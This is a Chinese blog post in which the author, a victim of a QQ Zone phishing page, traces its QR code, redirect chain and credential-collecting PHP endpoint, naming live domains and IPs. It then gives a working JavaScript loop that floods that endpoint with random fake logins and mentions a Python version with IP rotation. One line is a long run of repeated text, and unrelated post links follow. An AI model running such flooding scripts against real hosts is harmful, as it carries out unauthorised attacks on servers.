差点被一个截图忽悠了,分析一个QQ空间钓鱼网站
刚刚打开手机tim看到QQ空间有留言下面一个截图的东西(别扫进去输自己的账号密码哈,看看就得了,典型的钓鱼网站)
貌似在前几年就有此类网站,不过现在高级了些,下面就由图图来分析一下原理是什么鬼(毫无技术含量)大神快点绕道!!!
首先看到这个图片而写是熟人给你留言的,并且还是以好友备注的名字进行留言“XXX,我们合影的照片都在这里了 你太好笑了 照片呆呆的,长摁识别”会有这么一句话,好奇心强的都会点进去看~
【为什么要搞这种二维码呢? 就是为了不让一些在线解码的网站轻易识别 反而只有QQ、微信可以轻松识别出来】
然后就给你来了一个这个界面,模仿QQ空间的登录界面,还高级了点,加了所谓的“安全”键盘
看着毫无破绽,呆呆地输进账号密码,此时此刻没管对错
输完之后看到的却是QQ个人轨迹,并不是所谓的合照,而此时此刻,你输进去的账号密码就通过这个傻逼写的PHP接口进行get提交到了他的服务器中,然后通过此账号密码登录QQ空间获取好友列表和备注,进行批量地发布留言(一传十,十传百....)
我也中招了,想着不太对劲赶紧到QQ安全中心修改密码
下面就了分析一下毫无技术含量的原理吧!
简单粗暴点,就不弄什么思维导图了
用户扫码打开网址---输入账号密码---提交账号密码到php---然后跳转到QQ官方的个人轨迹活动网址---完事
首先用户扫码识别 识别内容https://w.url.cn/s/ApUGGIq 生成了腾讯短链
然后跳转到http://z3nfcjel.www.825480.cn/default.html#4201178?nsukey=aHR0cDovL3p4emNzLmNudnFBSFVBN0o=
这串get后缀的nsukey的值是Base64加密的
解密后得到:http://zxzcs.cnvqAHUA7J IP地址:120.240.95.40:8888
随后直接跳转到
https://sqd07y.coding-pages.com/agent.html?s=dCqSp4NasGicsZ%2FAWtsxTN8%2FjB39FdUm7duyDt36geIcW%2F4O7sEh5WA4mZFmVcr%2FrkhZtvSYfBjTZZrAjSV8l7f05yH28vl89Dyu6rVsojbm4BVNNKJGZ682Y5B9QWurBA6LTaJqMSLyTBDATDovkLHRJz5o7PqTHEuHaWJFwymMdHB%2BAhn8q9SIVEObQWs2IscPvCzygj3gYpEB0KOrPFyVE9d%2BzdpWZqf5Ely8lFMSyOEfguq42zQERaJVex2UZkR9e5fuDM7jRb9LrRXq%2B11y&nsukey=aHR0cHM6Ly9xZGhsY2dzLmNvbS9IVzBXOTVWVQ==
s的值不知道是用什么东西加密的
nsukey的值解码后得到:https://qdhlcgs.com/HW0W95VU
经过一波周折之后就进入了正式的界面
【https://qdhlcgs.com/】这个玩意
当时就是在这个页面输入了我的Q密,填完之后一激灵,完蛋,赶紧改密码先
在电脑浏览器上直接打开https://qdhlcgs.com/就会跳转到百度给你
审查下元素跳转宽度完美解决跳转问题,傻逼骗子判断不足啊
来随机填入账号密码然后提交
嗯~ 好东西, 登录...
0000438438这个账号可能存在吗?
点击完登录按钮之后直接通过get请求将你的账号密码提交到了https://qdhlcgs.com/dnf.php中,收集完之后估计下一步就会登录QQ空间进行群发留言......
https://qdhlcgs.com/dnf.php?u=0000438438&p=idiot-shabi
不严谨的参值,是个php小白?咱也不知道,咱也不敢问啊..
整个站点的用到的js和css全部是用外部链接
qdhlcgs.com 主机IP:36.250.0.137 中国 福建 福州 联通
请求接口:https://qdhlcgs.com/dnf.php
请求类型:GET
请求参值:u(账号) p(密码)
光拿到了接口怎么能行,搞个循环请求
<!DOCTYPE html> <html> <head><meta charset="utf-8"><title></title> </head><body><div class="box"><iframe src="" frameborder="0" width="1280" height="300" id="kuanjia"></iframe></div> </body> <script src="http://libs.baidu.com/jquery/2.1.4/jquery.min.js"></script> <script> var data,dqnr;setInterval(function () {data=randomWord(false, 9);dqnr = "https://qdhlcgs.com/dnf.php?u="+data+"&p="+data;console.log(dqnr);$('iframe').attr('src', dqnr);}, 1000);function randomWord(randomFlag, min, max){var str = "",range = min,arr = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'];if(randomFlag){range = Math.round(Math.random() * (max-min)) + min;}for(var i=0; i<range; i++){pos = Math.round(Math.random() * (arr.length-1));str += arr[pos];}return str; } </script></html>
用计时器每秒随机生成9位字符然后通过设置iframe框架的url一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环一直循环
在某爱那里有个老牛用Python写了死循环换IP请求,可以直接套用
(以后啊,看到这些东西就来分析一波....)
估计也就只有我这种小小学生才能上当了~~ 噗
才疏志大不自量 西家东家笑我狂
卑微啊~
要是能搞到未解析的PHP代码,获取这骚玩意的邮件,搞他..
技术贴完结~
差点被一个截图忽悠了,分析一个QQ空间钓鱼网站相关推荐
- 写一个程序,用于分析一个字符串中各个单词出现的频率,并将单词和它出现的频率输出显示。(单词之间用空格隔开,如“Hello World My First Unit Test”);...
功能实现类Test2: package com.kai.demo; import java.util.HashMap; import java.util.Iterator; import java.u ...
- 一个QQ空间的钓鱼盗号过程揭露,大家谨防上当
1.盗号过程 很久没有用过QQ空间了,今天突然QQ弹出一条消息,说我的一个好友留言中提到了我,但是我却也打不开这个链接. 于是,我就去她的空间留言板查看.发现第一条留言,是一个二维码 扫描之后,进入到 ...
- 基于SSH2做一个24小时订单分析表格
基于SSH2做一个24小时订单分析表格 以下为要实现的最终效果截图: ps:没有时间优化前段页面样式,对前段美化有要求的小伙伴可以自行引用BOOtStrap.esayUi 或者 layUi 自行优化. ...
- 手写一个原神祈愿分析工具
手写一个原神祈愿分析工具 之前一直通过游创工坊来进行祈愿抽卡数据分析,但是广告太多,而且担心auth_key泄露,于是自己花了一天时间动手实现了个数据分析工具,数据永久保存在本地,没有信息泄露风险,话 ...
- 汇编语言(第三版)王爽著(实验八)分析一个奇怪的程序
实验内容.程序清单及运行结果 分析下面的程序,在运行前思考:这个程序可以正确返回吗? 运行后思考:为什么会是这种结果? 通过这个程序加深对相关内容的理解. assume cs:codesg codes ...
- 自己编写的一个截图工具
http://blog.csdn.net/crystal_lz/article/details/9200859 上面是以前写的 不过现在重写了 增加了一些功能 源代码下载地址:http://downl ...
- 用系统架构中的系统思维分析一个咖啡厅系统
此文是对<系统架构>中第2章系统思维的笔记,前前后后看了很多遍,为了达到活学活用,尝试用系统思维分析一个生动的现实生活中的案例,这样有助于更深刻的理解及现实的建模能力.现分享给大家一起讨论 ...
- 分析一个文本(英文文章)(300k—500k)中的词出现的频率,并且把频率最高的10个词打印出来。...
最近老师出一个题目:分析一个文本(英文文章)(300k-500k)中的词出现的频率,并且把频率最高的10个词打印出来. 要分析每个词的频率,肯定要先把每个单词读出来并存储起来,用数据库存肯定是没那个必 ...
- 分析一个软件要考虑的问题
分析一个软件要考虑的问题 1.要分析它的所有功能,每一个细节都要注意到. 要知道它是干什么用的,它删除之后对其它地方有什么影响? 2.要找出它的设计缺陷所在.不合理的地方在哪里?并提出更好的改进措施. ...
- C语言 03-第一个C程序代码分析
本文目录 一.代码分析 二.开发和运行C程序的步骤 三.总结 说明:这个C语言专题,是学习iOS开发的前奏.也为了让有面向对象语言开发经验的程序员,能够快速上手C语言.如果你还没有编程经验,或者对C语 ...
最新文章
- HTTP协议基础知识点点滴滴
- java ssh shell命令_java 通过ssh 执行命令
- 巧用路径工具做流线字
- 软考信息系统项目管理师_管理科学(运筹学)---软考高级之信息系统项目管理师033
- 【自】数据库系统原理(三)——测试总结后,
- 全球及中国生物制药产业盈利现状及竞争格局展望报告2021-2027年
- mysql按年级班级排序_一个sql语句的问题,按照如何按照年纪班级科目显示名次...
- 华为摄像头 SDC REST 接口对接 经验
- 06年注册安全工程师试题
- 云服务 IaaS、PaaS、SaaS
- Android中TextView中的.setText和.append的区别
- 运筹学基础(名词解释题总结)
- Mac苹果电脑远程的方法和教程
- cc ,gcc 命令解释
- 西班牙符号Ññ 乱码的问题
- python画哆啦A梦和大雄
- JavaWeb黑马旅游网-学习笔记07【旅游线路查询】
- 网站seo优化必读篇(一)--外链
- 《CATIA V5 从入门到精通(第二版)》——第1章 CATIA V5R20概述 1.1 CATIA软件介绍及安装...
- 银行汇票与银行本票区别解析
热门文章
- 学校毕业论文格式对奇数页页眉和偶数页页眉有要求,遇到问题请教
- 8583 mac 字符选择 java 实现_转 8583包 mac算法
- RMAN-06091: no channel allocated for maintenance (of an appropriate type)
- kubernetes install completed
- 敏捷软件开发-薪水支付案例学习
- c++练手项目:英语单词拼写测试程序
- Chromium浏览器历史版本下载
- 星球大战1-6[Star Wars 1-6]
- python+django+vue高校奖学金评定管理系统
- Android - 控件android:ems属性